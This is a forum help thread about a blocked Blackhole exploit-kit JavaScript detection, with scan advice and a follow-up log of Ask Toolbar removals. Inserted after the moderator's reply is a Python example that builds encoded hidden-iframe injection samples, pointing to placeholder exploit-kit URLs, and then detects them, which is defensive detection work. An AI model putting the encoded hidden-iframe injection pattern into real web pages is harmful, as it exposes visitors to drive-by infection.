
Want to make sure MSE really blocked trojan


5 replies to this topic

#1 Renee32

Renee32

  • Members
  • 13 posts

Posted 25 June 2013 - 09:00 AM

Hi,

  I was online last night and got a notification from Microsoft Security Essentials that a trojan was blocked and quarantined. When I went into MSE it showed Trojan:JS/Blacoleref.DD in the quarantine file. I clicked 'remove' to get rid of it. I then did full scans with MSE, Malwarebytes, and SuperAntiSpyware which all came back negative except for some tracking cookies on SAS. I shut the computer down overnight and re-ran quick scans of all three this morning - still negative. My computer seems to be functioning normally and MSE's status says 'protected', but it sounds like this is a particularly nasty trojan that is good at hiding and I want to make sure it is really gone. Is there another scan that I should run, or can I trust that MSE successfully blocked it? Thank you so much for your help.





#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 25 June 2013 - 12:50 PM

The word obfuscated means to make obscure, unclear, altered or modified. When that term is used in conjunction with Java it means to obscure the real meaning and intent of JavaScript code. Obfuscated JavaScript code can be found inserted into compromised webpages by attackers who attempt to infect visitors with vulnerable or unprotected computers. Depending on the anti-virus vendor, such a detection will have various names, but they essentially mean the same thing.
 

Trojan:JS/BlacoleRef.DD is a detection name for an obfuscated JavaScript, often found inserted into compromised websites. This threat is designed to load a hidden IFrame that loads behind the user's browser, redirecting it to an exploit server known as "Blackhole"...There are no common symptoms associated with this threat - links are activated within IFrames while viewing web content on maliciously modified pages. Alert notifications from installed antivirus software may be the only symptoms....A user may be infected when they visit a compromised webpage. A vulnerable webpage may allow an attacker to successfully inject a client-side script, which then executes when a user visits the compromised page.

About Trojan:JS/BlacoleRef.DD

If your anti-virus provided a warning for an obfuscated JavaScript while you were surfing a website, most likely that type of threat was blocked/quarantined and there is nothing else to remove.

If you want to perform a more thorough browser clean up, please refer to:
Then perform a scan with ESET Online Anti-virus Scanner. <- This process may take several hours; that is normal.
  • Click the ESET Online Scanner button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.


  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and Remove found threats.
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer.
  • Please be patient as the scan can take some time to complete...close all programs and do NOT use the computer while the scan is running.
  • When the scan completes, click List Threats
  • Copy and paste the information in your next reply. If no malware was found you will not get a log.
  • Click the Back button.
  • Click the Finish button.
Note: If you recognize any of the detections as legitimate programs, it's possible they are "false positives" and you can ignore them or get a second opinion if you're not sure. Eset's detection rate is high and can include legitimate files which it considers suspicious, a Risk Tool, Hacking Tool, Potentially Unwanted Program, a possible threat or even Malware (virus/trojan) when that is not the case.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click here
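As an added illustration of the injection pattern described in the post above (this is example code, not part of the original thread and not Microsoft's or ESET's detection logic), the script below statically checks a page for what a Blackhole-style redirector does: an obfuscated script block that `document.write()`s a hidden iframe pointing at an exploit-kit landing page. The sample page, the `example.invalid` URLs and all function names are constructed for this example. It only peels the two trivial encodings shown (`unescape` of percent-encoded text and `String.fromCharCode`), so a clean result from it proves nothing about a real page; it is meant to show why "hidden iframe + encoded script" is the signal an AV signature keys on.

```python
import re
from urllib.parse import quote, unquote

# --- constructed sample input -------------------------------------------------
# Two hidden iframes, each wrapped in a one-layer encoding of the kind injected
# redirectors used, plus one legitimate script and one visible iframe as controls.
_HIDDEN_IFRAME_1 = ('<iframe src="http://example.invalid/main.php?page=1" '
                    'width="1" height="1" style="visibility:hidden"></iframe>')
_HIDDEN_IFRAME_2 = '<iframe src="http://example.invalid/load.php" width=0 height=0></iframe>'


def _js_unescape_literal(markup: str) -> str:
    """Encode markup the way an injected unescape("%3C...") payload carries it."""
    return 'unescape("' + quote(markup, safe="") + '")'


def _js_fromcharcode_literal(markup: str) -> str:
    """Encode markup as a String.fromCharCode(60,105,...) call."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in markup) + ")"


SAMPLE_PAGE = f"""<html><body>
<script>console.log("site analytics");</script>
<script>document.write({_js_unescape_literal(_HIDDEN_IFRAME_1)});</script>
<script>var s={_js_fromcharcode_literal(_HIDDEN_IFRAME_2)};document.write(s);</script>
<iframe src="http://example.invalid/visible" width="600" height="400"></iframe>
</body></html>"""

# --- analysis -----------------------------------------------------------------
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""", re.I)
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
UNESCAPE = re.compile(r"""unescape\(\s*(["'])((?:(?!\1).)*)\1\s*\)""")


def deobfuscate(js: str, max_rounds: int = 5) -> str:
    """Peel the two encodings above until the text stops changing (bounded)."""
    for _ in range(max_rounds):
        new = FROMCHARCODE.sub(
            lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"',
            js)
        new = UNESCAPE.sub(lambda m: '"' + unquote(m.group(2)) + '"', new)
        if new == js:
            break
        js = new
    return js


def parse_attrs(attr_text: str) -> dict:
    out = {}
    for m in ATTR.finditer(attr_text):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out


def _dim(value: str):
    value = value.lower().strip().rstrip("px").strip()
    return int(value) if value.isdigit() else None


def is_hidden(attrs: dict) -> bool:
    """Hidden = CSS-hidden or a 0/1-pixel frame; both are how drive-by frames stay invisible."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    w, h = _dim(attrs.get("width", "")), _dim(attrs.get("height", ""))
    return w is not None and h is not None and w <= 1 and h <= 1


def scan_page(html_text: str) -> list:
    """Return one finding per hidden iframe, whether written statically or from a decoded script."""
    findings = []
    # Static markup outside <script> blocks.
    for im in IFRAME.finditer(SCRIPT.sub("", html_text)):
        attrs = parse_attrs(im.group(1))
        if is_hidden(attrs):
            findings.append({"script_index": None, "src": attrs.get("src"), "obfuscated": False})
    # Markup that only appears after decoding a script's string literals.
    for idx, sm in enumerate(SCRIPT.finditer(html_text)):
        raw = sm.group(1)
        decoded = deobfuscate(raw)
        for im in IFRAME.finditer(decoded):
            attrs = parse_attrs(im.group(1))
            if is_hidden(attrs):
                findings.append({"script_index": idx, "src": attrs.get("src"),
                                 "obfuscated": decoded != raw})
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print(f)
```

Run it on the constructed page and it reports the two hidden frames (one from the `unescape` payload, one from `fromCharCode`) with their decoded `src`, and says nothing about the visible 600x400 iframe or the analytics script. The same shape of check is what quietman7's point rests on: the detection fires on the injected script's behaviour (create an invisible frame to a third-party URL), not on any file the visitor's machine keeps, which is why blocking it at the browser usually leaves nothing to clean.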

#3 Renee32

Renee32
  • Topic Starter

  • Members
  • 13 posts

Posted 25 June 2013 - 03:43 PM

Hi Janitor,

  Thanks for your reply! I did run ESET and it did not find anything related to Blacole, but did find other malware that it quarantined/removed. The log is below.

 

C:\Users\Home\AppData\Local\Temp\pkg_173c3270\AskTB\ApnIC.dll    a variant of Win32/Bundled.Toolbar.Ask application    cleaned by deleting - quarantined
C:\Users\Home\AppData\Local\Temp\pkg_173c3270\AskTB\asktbdet.zip    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
C:\Users\Home\Downloads\U_0087_01_P.msi    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
C:\Windows\Installer\141331a.msi    a variant of Win32/Bundled.Toolbar.Ask application    deleted - quarantined
 



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 25 June 2013 - 06:54 PM

Those detections are related to an Ask Toolbar distributed by Ask Jeeves.

Many toolbars, add-ons, screensavers, and weather monitoring programs come bundled with other software (often without the knowledge of the user) and can be the source of various issues and problems, including adware/browser hijacking. Even if advised of a toolbar, many folks do not know that it is optional and NOT necessary to install in order to operate the program.

I would have recommended you remove it anyway. Why?

#5 Renee32

Renee32
  • Topic Starter

  • Members
  • 13 posts

Posted 25 June 2013 - 07:54 PM

Thanks Quietman7 (sorry, thought 'Janitor' was your username :) ). I remember fighting an unwanted toolbar a while ago - that might have been it. I should be good for now. Thanks for all that you do on this forum!



#6 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,386 posts
  • Gender:Male
  • Location:Virginia, USA

Posted 25 June 2013 - 08:00 PM

You're welcome.

Tips to protect yourself against malware and reduce the potential for re-infection



